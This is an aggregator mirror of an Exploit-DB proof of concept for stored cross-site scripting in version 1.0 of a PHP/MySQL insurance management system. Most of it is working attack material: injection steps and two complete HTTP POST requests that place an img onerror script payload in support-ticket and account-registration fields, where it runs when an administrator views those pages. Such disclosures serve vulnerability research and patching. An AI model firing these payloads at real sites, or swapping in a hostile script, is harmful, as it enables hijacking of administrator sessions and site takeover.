3
[webapps] Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS
source link: https://www.exploit-db.com/exploits/51920
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS
# Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple
Stored XSS
# Date: 2024-02-08
# Exploit Author: Hakkı TOKLU
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: 1.0
# Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0
Support Ticket
Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered.
Example Request :
POST /e-insurance/Script/user/core/new_ticket HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41
category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1
Create Account
Click on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameter, then click Create Account button. XSS will be triggered when admin visits Users page.
Example Request :
POST /e-insurance/Script/core/new_account HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15
fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK